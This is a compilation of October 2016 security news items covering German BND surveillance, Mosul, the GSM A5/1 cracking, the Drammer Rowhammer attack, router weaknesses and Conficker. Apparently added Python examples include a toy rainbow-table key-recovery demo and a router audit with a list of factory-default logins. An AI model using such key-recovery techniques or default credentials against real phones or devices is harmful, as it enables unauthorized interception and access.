The German Parliament has passed a controversial surveillance law that appears to give more power to the BND intelligence agency.
The German Parliament last week approved a controversial espionage law that will nominally tighten oversight of the BND intelligence agency but that, according to privacy advocates, gives the authorities more power.
Critics focused on a clause that allows the BND to eavesdrop on the communications of foreign organizations and individuals, on German soil and abroad, that transit a major internet exchange point in Frankfurt.
In September the Frankfurt-based exchange operator DE-CIX filed a suit against the government in a court in Leipzig, contesting the legality of the surveillance.
The German Government maintains that the measures approved in the surveillance law will allow it to investigate online crime and terrorism.
“How do we want to find terror suspects? How do we want to detect them if not through those means?” said Clemens Binninger, a lawmaker with Chancellor Angela Merkel's conservative party.
In the past the BND was not authorized to spy on the German population, but the new law will allow it under specific circumstances.
Previously the BND was allowed to monitor at most 20 percent of the traffic at a single exchange point; the new law removes that limit on its interception of Internet traffic.
“The law stipulates that through this activity it cannot be ruled out that the communications of German citizens and entities could also be accidentally intercepted, a major shift for the BND, which had been forbidden from spying on Germans,” reads a Reuters report.
The Greens have voiced their disappointment with the law and threatened to petition Germany's highest court and the European Court of Justice to have it repealed.
The law is considered a serious threat to the privacy of Germans; politicians and privacy advocates fear dragnet surveillance.
Lawmaker Martina Renner of the hard-left Left party suggests the monitoring equipment used by the BND cannot tell messages sent by foreigners from those sent by Germans.
The BND's surveillance activities have caused intense debate at home. According to revelations published by Der Spiegel, the agency supported the NSA in its global surveillance.
The entrance to the headquarters of the Federal Intelligence Service (BND) in Pullach near Munich, photographed on Wednesday, 10 May 2006. Contrary to original plans, the Pullach BND headquarters will not be closed after all: the technical reconnaissance centre, with about 1,500 staff, stays in Pullach, while the rest of the 6,000-strong workforce moves to Berlin. Photo: Johannes Simon/ddp
The BND helped the NSA monitor European politicians, and the US agency targeted private companies and entities worldwide to establish dominance in cyberspace. Among the victims were the German Government and its politicians, including Chancellor Angela Merkel. The German Government was shocked at the time and expressly voiced its dissent to President Obama.
The BND supported espionage operations against various targets, including the European companies EADS (the manufacturer of Airbus aircraft) and Eurocopter, and European politicians, Germans among them.
In August the German weekly Die Zeit published documents revealing how German intelligence struck a deal with the NSA to obtain access to the XKeyscore surveillance platform.
Internal documents show that Germany's domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the XKeyscore software from the NSA in return for data from Germany.
Back in 2011 the NSA demonstrated XKeyscore's capabilities to the BfV. After two years of negotiation, the BfV signed an agreement to receive the NSA software and install it to analyze metadata collected on German citizens; in return, the German agency promised to share the metadata it collected.
The NSA tool collects “nearly everything a user does on the internet”; XKeyscore offers the “widest-reaching” collection of online data, analyzing the content of e-mails, social media and browsing history.
In 2013, documents leaked by Edward Snowden showed that a tool named DNI Presenter allows the NSA to read the content of stored e-mails and also lets analysts track a user's activity on Facebook through XKeyscore.
According to Die Zeit, the “Terms of Reference” document stated: “The BfV will: To the maximum extent possible share all data relevant to NSA's mission”.
The BfV did not disclose the details of the agreement to Germany's data protection commissioner, nor did it inform the Parliamentary Control Panel.
In January the BND resumed its internet surveillance with NSA support; the activity had been suspended after the revelations about mutual espionage. In July 2015 WikiLeaks revealed extensive economic espionage by the NSA in Germany, with particular interest in the Greek debt crisis.
Returning to the new German surveillance law: it bans the intelligence service from spying on EU countries and their citizens, as well as EU institutions, except when investigating terrorist activity.
“It also requires the BND to submit requests for cooperation with other spy agencies to a parliamentary committee and bans the agency from carrying out industrial espionage,” Reuters states.
“It requires the head of the BND, the chancellor's office and an independent panel of judges to approve strategic foreign espionage activities.”
Discovery of Weapons Cache Reignites Fears ISIS Will Use Chemical Weapons in Battle for Mosul
25.10.2016 securityaffairs Cyber
The battle for Mosul between the international coalition and ISIS is expected to become the largest fought in Iraq since the US-led operation of 2003.
According to the Iraqi army, approximately 50 villages have been retaken from ISIS since last Monday as the army prepares for the assault on Mosul, where 5,000 to 6,000 ISIS fighters are believed to remain.
The international coalition battling to drive ISIS out of Mosul is a disparate assembly lacking true cohesion, as each member has its own reasons for joining the offensive.
“It’s a very, very dangerous cocktail,” Marina Ottaway, a Middle East expert at the Woodrow Wilson International Center for Scholars, said. “This is a group with completely different end-goals. There is a real fear that when they get rid of ISIS from Mosul then things are really going to blow up.”
The Key Players and Their Motivations:
Iraqi Security Forces – Leading the mission to recapture Mosul are Iraq's security forces. In charge of a coalition of some 65,000 troops, the Iraqis have returned to the scene of their defeat re-energized, and trained and equipped by the US. In recent months they have notched up several victories liberating other ISIS-held areas.
Kurdish Peshmerga – While Iraqi security forces have been attacking from the south, Kurdish forces from Iraqi Kurdistan have advanced from the east and north. The Kurdish forces, known as Peshmerga, are in some places fighting alongside Iraqi forces. It is a marriage of convenience and a potentially uneasy alliance. Both have an immediate need to defeat ISIS, as well as a U.S.-brokered oil deal signed in August. And while the Iraqi government wants to eliminate ISIS' presence in Iraq, the Kurds have an additional motive: becoming an independent, internationally recognized state.
Iraqi Militias – The majority of the Iraqi militias are Shiite Muslims backed by Iran. They aren’t officially part of the Iraqi security forces, but do fight in concert with them. According to NBC News, “while not officially part of the Iraqi security forces, the Popular Mobilization Units, or PMU, was formally recognized by the Baghdad government earlier this year as an ‘independent military formation.’ The PMU’s involvement in the ISIS fight has drawn significant criticism. An Amnesty International report this week accused the militias of ‘war crimes’ and ‘gross human rights violations,’ alleging its fighters were guilty of torturing, forcibly disappearing and executing Sunni Muslims they suspected of being ISIS sympathizers.”
Turkey – While Turkey’s involvement in the Mosul operation is still somewhat ambiguous, Turkey has set up a base in Kurdish-controlled territory inside Iraq. This is an action which has angered the Baghdad government, because it has not sanctioned Turkey’s presence. Turkey has, however, been training local Sunni tribesmen to join the assault on Mosul and local Christian and Yezidi fighters have also joined the offensive.
International Forces – On the ground the U.S. has more than 4,800 troops stationed in Iraq and reportedly “a good sizable portion” are at Qayyarah Airfield, a base 40 miles south of Mosul. Then too, some 200 U.S. personnel are embedded with Iraqi and Kurdish forces closer to the front. These are mostly special forces with advisory roles and Joint Terminal Attack Controllers who call in airstrikes. The US is joined by other nations in carrying out NATO’s “train, advise and assist” mandate. This includes forces from Australia, New Zealand, France, Sweden, Italy, Denmark and others.
In the midst of gearing up for battle, a chemical weapons cache was uncovered. Photographs taken in mid-October of the weapons, in addition to chemical readings from the stockpiled weapons, were obtained by the ground team of Ed Alexander of BLACKOPS Cyber, an intelligence agency which specializes in counterterrorism, advanced cyber capabilities and Darknet operations.
Iraqi troops had captured the cache of chemical weapons, which were previously held by ISIS in Qayarah, Iraq, a city east of ISIS territory in Mosul. This location is not far from where ISIS fired artillery shells filled with mustard gas at U.S. troops last month. One of three tests on the weapons showed a positive reading of a mustard agent, according to Military.Com.
The discovery of the weapons cache validates growing concerns that ISIS is planning to use chemical weapons against U.S. and Iraqi forces during the Mosul battle.
Iraqi forces requested that coalition forces assist with the recovery and containment of the weapons, including the 36 rockets found at the site, Alexander said.
According to an article by Joshua Phillip, at Epoch Times:
“According to Drew Berquist, a former intelligence contractor who recently returned from deployment in Iraq, ISIS has two factories for making homemade rockets—one in Raqqa, Syria, and another in Mosul—and said ‘that’s what these look like.’
He said the picture of the rockets are telling, ‘because they do that all over the region,’ and that it’s likely ISIS has stepped up its production for the coming fight for Mosul because ‘they view this as an apocalyptic battle.’”
Berquist also cautioned that the rockets can be fitted with different types of weapons, including chemical and explosive weapons. He said that ISIS has definitely used chemical weapons. “They’ve got them, and they’ll try to use them in the days and weeks ahead in Mosul.”
Moreover, Dr. Robert J. Bunker, adjunct faculty at Claremont Graduate University, who has studied chemical warfare, indicated that the images do show positive readings of chemical weapons.
ISIS has already massacred 284 villagers, including children, who were being used as human shields. The terrorist group has also taken 550 families hostage for continued use as human shields in Mosul, according to the UN. But they, too, are at risk of being killed.
Local families have been waving the white flag as ISIS rounds up villagers in an attempt to hold off the approaching coalition forces in the battle for Mosul. Unfortunately, the waving of the white flags has been in vain.
Hacking GSM A5 crypto algorithm by using commodity hardware
25.10.2016 securityaffairs Mobil
Researchers demonstrated how to crack GSM A5/1 Stream Cipher using a general-purpose graphics processing unit computer with 3 NVIDIA GeForce GTX690 cards.
A group of security researchers from the Agency for Science, Technology and Research (A*STAR), demonstrated that the crypto scheme used in the GSM mobile phone data can be easily hacked within seconds. Actually, it was already known that the A5/1 is vulnerable, at least since 2009.
Weaknesses in the crypto algorithms (the A3 algorithm for authentication, the A5 algorithm for encryption, the A8 algorithm for key generation), which were never submitted to peer review because they were kept secret, are the main security issue with 2G implementations.
GSM only authenticates the user to the network and not vice versa. The security model, therefore, offers confidentiality and authentication, but limited authorization capabilities, and has no non-repudiation features. GSM uses several cryptographic algorithms for security. The A5/1 and A5/2 stream ciphers are used for ensuring over-the-air voice privacy. Both algorithms have been exploited:
A5/2 is exploitable with a real-time ciphertext-only attack;
A5/1 with a rainbow table attack.
The main security concerns with GSM are:
Communications and signaling traffic in the fixed network are not protected.
Active attacks involving some network elements (e.g. BTS: Base Station) are not addressed.
GSM is only as secure as the fixed networks to which it connects.
Lawful interception was only considered as an afterthought.
Terminal identity cannot be trusted.
From a purely technological perspective, 3G networks use the KASUMI block cipher instead of the older A5/1 stream cipher, but KASUMI is also affected by several serious weaknesses.
Now the researchers from the A*STAR, Singapore, have demonstrated how to break the A5/1 stream cipher implemented by 2G by using commodity hardware.
“GSM uses an encryption scheme called the A5/1 stream cipher to protect data,” explained Jiqiang Lu from the A*STAR Institute for Infocomm Research. “A5/1 uses a 64-bit secret key and a complex key-stream generator to make it resistant to elementary attacks such as exhaustive key searches and dictionary attacks.”
The researchers exploited two security weaknesses to compute a look-up table on commodity hardware in 55 days. Once the rainbow table, which is 984 GB in size, has been computed, they can determine the secret key used to encrypt communications in just nine seconds.
The new method improves the classic brute force attack drastically reducing the time required for computation.
“We used a rainbow table, which is constructed iteratively offline as a set of chains relating the secret key to the cipher output,” added Lu.
“When an output is received during an attack, the attacker identifies the relevant chain in the rainbow table and regenerates it, which gives a result that is very likely to be the secret key of the cipher.”
The experts used equipment consisting of a general-purpose graphics processing unit computer with three NVIDIA GeForce GTX 690 cards, for a total cost of about $15,000.
“On a general-purpose graphics processing unit (GPGPU) computer with 3 NVIDIA GeForce GTX690 cards that cost about 15,000 United States dollars in total, we made a unified rainbow table of 984 GB in about 55 days, and implemented a unified rainbow table attack that had an online attack time of 9 s with a success probability of 34 % (or 56 %) when using 4 (respectively, 8) known keystreams (of 114 bits long each).” reads the white paper entitled Time–Memory Trade-Off Attack on the GSM A5/1 Stream Cipher Using Commodity GPGPU in the journal Applied Cryptography and Network Security. “If two such tables of 984 GB were generated, the attack would have an online attack time of 9 s with a success probability of 81 % when using 8 known keystreams. The practical results show again that nowadays A5/1 is rather insecure in reality and GSM should no longer use it.”
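The rainbow-table mechanics Lu describes (chains built offline that relate keys to cipher output, an endpoint lookup and a chain regeneration online) as an added worked example. This is illustration code written for this page, not the A*STAR team's implementation: it assumes a constructed toy one-way keystream function over a 16-bit key space in place of A5/1, and tiny chain parameters, so it runs in seconds. The time/memory trade-off and the "success probability" behaviour are the same in kind as the paper's 984 GB table, only not in scale.

```python
import hashlib
import random

# Toy parameters: a 16-bit key space keeps the demo fast. The paper's attack
# targets A5/1's 64-bit key with a 984 GB table; the mechanics are the same.
KEY_BITS = 16
KEY_SPACE = 1 << KEY_BITS
CHAIN_LEN = 50       # t: columns per chain
NUM_CHAINS = 3000    # m: rows (chains) in the table


def toy_keystream(key):
    """Stand-in for the cipher's keystream generator (constructed; NOT A5/1).
    Maps a key to a 16-bit keystream word through a one-way function, so the
    only generic way back from output to key is search."""
    digest = hashlib.sha256(key.to_bytes(4, "big")).digest()
    return int.from_bytes(digest[:2], "big")


def reduce_to_key(output, column):
    """Reduction function R_i: maps a keystream word back into the key space.
    A different R_i per column is what makes this a rainbow table (far fewer
    chain merges than Hellman's single reduction function)."""
    return (output ^ (column * 0x9E37)) & (KEY_SPACE - 1)


def chain_keys(start, chain_len=CHAIN_LEN):
    """Keys k_0 .. k_{t-1} visited by one chain: k_0 = start, k_{i+1} = R_i(f(k_i))."""
    keys = [start]
    for i in range(chain_len - 1):
        keys.append(reduce_to_key(toy_keystream(keys[-1]), i))
    return keys


def chain_endpoint(start, chain_len=CHAIN_LEN):
    """k_t, the only value stored for the chain besides its start."""
    key = start
    for i in range(chain_len):
        key = reduce_to_key(toy_keystream(key), i)
    return key


def build_table(num_chains=NUM_CHAINS, chain_len=CHAIN_LEN, seed=1):
    """Offline phase (the 55 days in the paper): m chains of length t, storing only
    endpoint -> start points. Storage is m entries whatever t is; that is the trade-off."""
    rng = random.Random(seed)
    table = {}
    for _ in range(num_chains):
        start = rng.randrange(KEY_SPACE)
        table.setdefault(chain_endpoint(start, chain_len), []).append(start)
    return table


def recover_key(table, observed, chain_len=CHAIN_LEN):
    """Online phase (the 9 s in the paper): assume the observed word sits in column i,
    walk to the would-be endpoint, look it up, regenerate that chain from its start and
    return the key that produces the observed word. None if the table does not cover it."""
    for i in range(chain_len - 1, -1, -1):          # cheapest hypotheses first
        key = reduce_to_key(observed, i)
        for j in range(i + 1, chain_len):
            key = reduce_to_key(toy_keystream(key), j)
        for start in table.get(key, ()):            # may be a merged chain: verify
            for candidate in chain_keys(start, chain_len):
                if toy_keystream(candidate) == observed:
                    return candidate
    return None


def success_rate(table, trials=200, seed=7):
    """Fraction of random keys recovered from a single observed keystream word."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        target = rng.randrange(KEY_SPACE)
        if recover_key(table, toy_keystream(target)) is not None:
            hits += 1
    return hits / trials


if __name__ == "__main__":
    table = build_table()
    print(f"chains stored: {sum(len(v) for v in table.values())}, "
          f"success rate: {success_rate(table):.2f}")
```

The online phase only checks a candidate against the single observed word, so a practitioner would confirm a recovered key against a longer keystream before trusting it; the paper's rising success probability with 4 or 8 known keystreams is not modelled here.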
Millions of Android smartphones exposed to new Drammer Android attack
25.10.2016 securityaffairs Android
A new method of attack dubbed DRAMMER could be exploited to gain ‘root’ access to millions of Android smartphones and take control of affected devices.
Earlier last year, security researchers from Google’s Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.
Now, the same previously found designing weakness has been exploited to gain unfettered “root” access to millions of Android smartphones, allowing potentially anyone to take control of the affected devices.
Experts from the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that could be exploited to gain “root” access to millions of Android smartphones by targeting the device’s dynamic random access memory (DRAM).
The attack, called Rowhammer, is not new, but this is the first time it has been successfully used against mobile devices.
In March 2015, security researchers at Google’s Project Zero team demonstrated how to hijack Intel-compatible PCs running Linux by exploiting physical weaknesses in certain varieties of DDR DRAM (double data rate dynamic random-access memory) chips.
By exploiting the Rowhammer technique, attackers can obtain higher kernel privileges on the target system. Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows; this means that, in principle, an attacker can change the value of bits in memory.
The Rowhammer attack on a mobile device involves a malicious application that, once running, repeatedly accesses the same “row” of transistors on a memory chip within a tiny fraction of a second (the “hammering” process).
Hammering a specific portion of memory can electrically interfere with neighboring rows. This interference can cause the row to leak charge into the next row, which eventually causes a bit to flip and the data to change.
An attacker can exploit these modifications to execute their own code and gain control of the device.
In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause “bit flipping” in an adjacent row that could allow anyone to change the value of contents stored in the memory.
The researchers created a proof-of-concept exploit, dubbed DRAMMER, to test the Rowhammer attack on mobile devices.
Details on the DRAMMER attack are included in a paper published by the experts and on this page.
To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER. The hack could modify crucial bits of data, allowing an attacker to root Android devices from major vendors, including Samsung, OnePlus, LG, and Motorola.
The experts exploited the Android mechanism known as the ION memory allocator, which gives an app direct access to the dynamic random access memory (DRAM). The ION memory allocator also allows attackers to identify adjacent rows on the DRAM, which is essential for a Rowhammer attack to generate bit flips.
This capability allowed the researchers to achieve root access on the victim’s device, giving them full control of the mobile device.
“On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict,” states the paper.
“We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control.”
“Drammer is a new attack that exploits the Rowhammer hardware vulnerability on Android devices. It allows attackers to take control over your mobile device by hiding it in a malicious app that requires no permissions. Practically all devices are possibly vulnerable and must wait for a fix from Google in order to be patched. Drammer has the potential to put millions of users at risk, especially when combined with existing attack vectors like Stagefright or BAndroid.” states a blog post published by the researchers.
The experts successfully rooted Android handsets including Google’s Nexus 4 and Nexus 5; LG’s G4; Samsung Galaxy S4 and Galaxy S5, Motorola’s Moto G models from 2013 and 2014; and OnePlus One.
“Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is…(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions,” reads a paper published by the experts.
The DRAMMER app is able to take over the victim’s mobile within minutes and requires no user interaction.
The researchers published the following two proof-of-concept videos, which demonstrate the DRAMMER attack in action against an unrooted LG Nexus 5.
In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5, while in the second one the researchers show how the DRAMMER attack can be combined with Stagefright bug that is still unpatched in many older Android devices.
The researchers have released on GitHub the source code of the DRAMMER app in order to allow users to test their mobile device and anonymously share their results.
The experts reported the issue to Google in July, and the tech giant recognized it as a “critical” vulnerability and awarded the researchers $4,000 under its bug bounty program.
The issue is expected to be partially addressed in the upcoming November security bulletin, which will make it more difficult for an attacker to launch a DRAMMER attack.
The problem is that some of the software features DRAMMER exploits are so essential to any OS that it is not possible to remove or modify them without a significant impact on the overall design of the device.
Kaspersky Lab launched the new Lab ICS-CERT
25.10.2016 securityaffairs Security
Kaspersky Lab has launched a new global computer emergency response team (CERT), the Kaspersky Lab ICS-CERT, focusing on industrial control systems (ICS).
Kaspersky has anticipated the launch of an Industrial Control Systems CERT. Of course, I’m joking; anyway, I have always maintained that the creation of such a structure represents an important achievement for the cyber security of any government.
Kaspersky has presented the Kaspersky Lab ICS-CERT, an infrastructure that aims to share knowledge of cyber threats and of securing industrial systems. The Kaspersky Lab ICS-CERT will coordinate the exchange of information between stakeholders, making the adoption of countermeasures and the rapid response to security incidents more efficient.
“Industrial Systems Emergency Response Team is a special Kaspersky Lab project that will offer the wide range of information services, starting from the intelligence on the latest threats and security incidents with mitigation strategies and all the way up to incident response and investigation consultancy and services. In addition to the latest intelligence about threats and vulnerabilities, Kaspersky Lab’s Industrial CERT will share expertise on compliance. Being a non-commercial project, ICS CERT will share information and expertise to its members free of charge.” wrote Kaspersky on the Kaspersky Lab ICS-CERT page.
Like any other CERT, the Kaspersky Lab ICS-CERT will report on the current threat landscape and share information on the latest threats, vulnerabilities, security incidents, mitigation strategies, compliance, and investigations.
It is important to highlight that the initiative launched by Kaspersky is a non-commercial project, the experts of the company will share information for free.
Of course, it is essential for the success of the initiative that ICS product vendors, government agencies, critical infrastructure operators, and other actors provide their valuable contribution.
Everyone benefits from contributing to this type of initiative. It will be particularly important for organizations using ICS/SCADA systems, which will find all the information aggregated in a single portal; in turn, they can share their own experience of cyber threats, increasing the level of awareness of the overall community.
“Today’s approach to cyber security highlights the importance of accumulating intelligence on the latest threats, in order to develop protection technologies. This is especially true for industrial infrastructure, which has specific threats, highly customized hardware and software, and strict requirements for reliability,” explained Andrey Doukhvalov, head of future technologies and chief security architect at Kaspersky.
“As a security vendor, we have years of experience analyzing threats and helping industrial operators with threat prevention and detection, incident response, staff training, and the prediction of future attack vectors. We are confident that sharing intelligence, or, in a broader way, exchanging knowledge between vendors and operators, is an important step towards more secure critical infrastructure.” “By establishing ICS-CERT we are expanding the availability of the industry’s expertise in a way that no other private security vendor has done before.”
Home routers are not secure, Eset warns
25.10.2016 SecurityWorld Threats
The most common problems include software vulnerabilities and weak passwords; because of them, one router in seven is vulnerable. An Internet router can thus easily become, quite literally, the Achilles’ heel of security.
Eset published a survey focused on one of the most underestimated security threats: home routers. It found that 15 percent of the tested devices use weak passwords, most often with the username “admin”.
The survey further showed that roughly 7% of the tested devices contained a vulnerability that could be classified as of medium or high severity. Port scanning revealed that network services are very often accessible not only from internal networks but also from external ones.
“The test focused on checking default usernames and passwords and their most commonly used combinations. It is worrying that in one case out of seven the attack was successful,” says Peter Stančík, Security Evangelist at Eset.
“Insecure services such as Telnet in particular should definitely not be open, not even to internal networks, which was unfortunately found in 20 percent of cases,” Stančík adds.
Most of the vulnerabilities found, more than 50%, stemmed from improperly configured access rights.
The second most common vulnerability (40%) was command injection, which aims to execute arbitrary commands on the remote operating system through vulnerabilities in applications that do not sufficiently validate their input.
Almost 10% of the software vulnerabilities concerned cross-site scripting (XSS), which allows an attacker to change the router’s configuration so that malicious scripts run on the client side.
“The results show that routers can be attacked fairly easily by exploiting one of the vulnerabilities found. They can thus become the Achilles’ heel of security for households and small businesses alike,” Stančík adds.
The results were collected from users of Eset’s products (Smart Security and Smart Security Premium), which include a newly implemented home network protection feature that lets users detect possible vulnerabilities on their home routers in the form of misconfiguration, potentially dangerous network services, or weak passwords.
Your router or IP camera may have taken part in Friday’s attack on popular websites. Check them
24.10.2016 Živě.cz Computer attack
On Friday the Internet experienced a massive DDoS attack, during which a number of large websites stopped working. As Motherboard pointed out, devices from the Mirai botnet took part in the attack; the botnet also includes so-called Internet of Things (IoT) devices such as routers and IP cameras.
According to available information, only 10% of the botnet’s devices joined the attack, but even that was enough to knock popular services such as Twitter, PlayStation Network, PayPal and others offline.
If you want to find out whether one of your network devices could be part of a similar botnet, try the Bull Guard web service.
The tool primarily scans IoT devices on the network and checks for possible vulnerabilities, including the use of default, vendor-preset passwords. Those are a very common reason why a device ends up in such a botnet.
If Bull Guard discovers such devices, it alerts you to them. The user should then change the login credentials. After all, that should be done when buying any device, especially one that will be connected to the Internet.
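A minimal audit of the weaknesses the two articles above list (default or weak admin passwords, Telnet left open even towards the internal network, management services reachable from the WAN side), as an added example written for this page; it is not Eset’s or BullGuard’s tooling. The device inventory, the short list of factory-default logins, the password rules and the port table are constructed for illustration; a real audit would take the inventory from a network scan rather than a hard-coded list.

```python
# Constructed inventory of home/small-office devices (illustrative, not scan output).
# "services" holds (tcp port, interface the service listens on).
SAMPLE_DEVICES = [
    {"name": "living-room-router", "user": "admin", "password": "admin",
     "services": [(80, "lan"), (23, "lan")]},
    {"name": "office-router", "user": "admin", "password": "Tr0ub4dor&3",
     "services": [(443, "lan"), (22, "wan")]},
    {"name": "ip-camera-01", "user": "root", "password": "root",
     "services": [(80, "wan"), (23, "wan")]},
    {"name": "guest-ap", "user": "admin", "password": "sunshine",
     "services": [(443, "lan")]},
]

# Factory-default logins seen on consumer devices (constructed short list, not exhaustive).
DEFAULT_CREDENTIALS = {
    ("admin", "admin"), ("admin", "password"), ("admin", "1234"), ("admin", ""),
    ("root", "root"), ("root", "admin"), ("user", "user"),
}
# Ports of typical device management services (assumed table).
MANAGEMENT_PORTS = {22: "ssh", 23: "telnet", 80: "http", 443: "https", 8080: "http-alt"}
COMMON_PASSWORDS = {"password", "12345678", "qwerty123", "letmein1"}


def is_weak_password(password):
    """Short, a single character class, or on the small constructed list of common choices."""
    if len(password) < 8 or password.lower() in COMMON_PASSWORDS:
        return True
    classes = (any(c.islower() for c in password) + any(c.isupper() for c in password)
               + any(c.isdigit() for c in password) + any(not c.isalnum() for c in password))
    return classes < 2


def audit_device(device):
    """Findings for one device, in a fixed order so reports are comparable."""
    findings = []
    if (device["user"], device["password"]) in DEFAULT_CREDENTIALS:
        findings.append("default factory credentials in use")
    elif is_weak_password(device["password"]):
        findings.append("weak admin password")
    for port, iface in device["services"]:
        name = MANAGEMENT_PORTS.get(port, f"tcp/{port}")
        if port == 23:
            # Cleartext admin protocol: flagged on any interface, as the Eset survey did.
            findings.append(f"telnet open on {iface}")
        if iface == "wan" and port in MANAGEMENT_PORTS:
            findings.append(f"management service {name} reachable from the internet")
    return findings


def audit_fleet(devices):
    """Map device name -> list of findings."""
    return {d["name"]: audit_device(d) for d in devices}


def share_affected(report, keyword):
    """Fraction of devices with at least one finding containing keyword,
    the kind of figure the survey reports (e.g. 'one in seven')."""
    hit = sum(1 for findings in report.values() if any(keyword in f for f in findings))
    return hit / len(report) if report else 0.0


if __name__ == "__main__":
    for name, findings in audit_fleet(SAMPLE_DEVICES).items():
        print(name, "->", "; ".join(findings) or "no findings")
```

The two checks that matter most map directly onto the survey’s headline numbers: a default or weak login is the condition Bull Guard’s scan looks for, and Telnet open on the LAN is the 20 percent case Stančík singles out.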
An insidious worm still frightens security experts years later
21.10.2016 Novinky/Bezpečnost Viruses
The first version of the insidious Conficker worm began circulating on the Internet back in 2008. Although the security of computer systems has improved considerably since then, new versions of this threat keep on haunting users. This dangerous malware currently even tops the statistics of the most widespread virus threats.
In 2008 Conficker was the most widespread threat of all for many long months, and that remained practically true for the whole of 2009. In recent years, however, this uninvited guest had not made itself heard at all.
The turning point came only this year, when cybercriminals began to use it heavily. According to an analysis by the antivirus company Check Point, this worm was the most widespread threat of all, both in the Czech Republic and abroad.
“In September Conficker was responsible for 14 percent of all detected attacks overall,” noted David Řeháček, a security expert at Check Point.
It also infected computers at a power plant
Conficker exploits a vulnerability in the Windows operating system. A security patch for it has existed for a long time, but as the statistics make clear, a large share of users do not bother to install it. At the end of April it even emerged that this dangerous worm had nested in computers at the Gundremmingen nuclear power plant in Bavaria.
Conficker’s authors built a large network of infected PCs around the world, usable for any task, since the virus lets them control the computers remotely. To control it, the worm’s authors used an innovative method: every day new random domains are generated, to which the virus reports and requests instructions.
This practically prevents security experts from taking Conficker out of operation completely.
Updates are important
Most antivirus programs should nevertheless cope even with the newest version. If not, various online antivirus scanners can help track it down. These are usually available free of charge.
How can you ensure the worm never gets into the computer at all? Security experts strongly recommend installing all available security updates, which are provided through the automatic update system or the Windows Update page.
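The daily random rendezvous domains described above show up in a resolver log as a burst of unpronounceable names queried by one host. The following added detection example, written for this page and not taken from Check Point or the article, runs a simple entropy and vowel-ratio heuristic over a constructed DNS log and flags clients that query several such names in a window; the thresholds, the log format and the log lines are constructed assumptions, not Conficker’s actual domain scheme.

```python
import math
from collections import defaultdict

# Constructed resolver log (not real data): timestamp, client, record type, query name.
SAMPLE_DNS_LOG = """\
2016-10-21T08:00:01 10.0.0.12 query www.novinky.cz
2016-10-21T08:00:05 10.0.0.12 query mail.google.com
2016-10-21T08:01:10 10.0.0.27 query qxvbzkfjwlp.org
2016-10-21T08:01:11 10.0.0.27 query tmwphzqcyvrkd.info
2016-10-21T08:01:12 10.0.0.27 query lkwvbdqpxjnzr.net
2016-10-21T08:02:40 10.0.0.12 query cdn.example.com
2016-10-21T08:03:00 10.0.0.27 query zvpqkxwtmbhn.biz
2016-10-21T08:03:01 10.0.0.27 query qxvbzkfjwlp.org
"""

VOWELS = set("aeiou")


def shannon_entropy(text):
    """Bits per character; random-looking labels score close to log2(len)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_label(qname):
    """Label directly under the TLD (simplification: no public-suffix list)."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def looks_generated(qname, min_len=10, max_vowel_ratio=0.25, min_entropy=3.0):
    """Heuristic for algorithmically generated names: long, few vowels, high entropy.
    Thresholds are assumed values; tune them against your own baseline traffic."""
    label = registered_label(qname)
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0
    return (len(label) >= min_len
            and vowel_ratio <= max_vowel_ratio
            and shannon_entropy(label) >= min_entropy)


def flag_clients(log_text, min_domains=3):
    """Clients that queried at least min_domains distinct generated-looking names.
    Counting distinct names per client is what separates a DGA beacon from a
    single odd lookup."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue                      # skip malformed lines
        _ts, client, _kind, qname = parts[:4]
        if looks_generated(qname):
            seen[client].add(registered_label(qname))
    return {client: len(names) for client, names in seen.items() if len(names) >= min_domains}


if __name__ == "__main__":
    for client, count in flag_clients(SAMPLE_DNS_LOG).items():
        print(f"{client}: {count} generated-looking domains")
```

A hit is a lead, not a verdict: CDN and tracking hostnames can score high too, so the alert is worth pairing with the NXDOMAIN rate for the same client, which a worm cycling through unregistered daily domains drives up.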
New Drammer Android Hack lets Apps take Full control (root) of your Phone
24.10.2016 thehackernews Android
Earlier last year, security researchers from Google's Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.
Now, the same previously found designing weakness has been exploited to gain unfettered "root" access to millions of Android smartphones, allowing potentially anyone to take control of affected devices.
Researchers in the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that targets a device's dynamic random access memory (DRAM) using an attack called Rowhammer.
Although we are already aware of the Rowhammer attack, this is the very first time when researchers have successfully used this attack to target mobile devices.
What is DRAM Rowhammer Attack?
The Rowhammer attack against mobile devices is equally dangerous because it potentially puts all critical data on millions of Android phones at risk, at least until a security patch is available.
The Rowhammer attack involves executing a malicious application that repeatedly accesses the same "row" of transistors on a memory chip in a tiny fraction of a second in a process called "Hammering."
As a result, hammering a memory region can disturb neighboring rows, causing the row to leak charge into the next row, which eventually causes a bit to flip. And since bits encode data, this small change modifies that data, creating a way to gain control over the device.
In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause "bit flipping" in an adjacent row that could allow anyone to change the value of contents stored in the memory.
Is Your Android Phone Vulnerable?
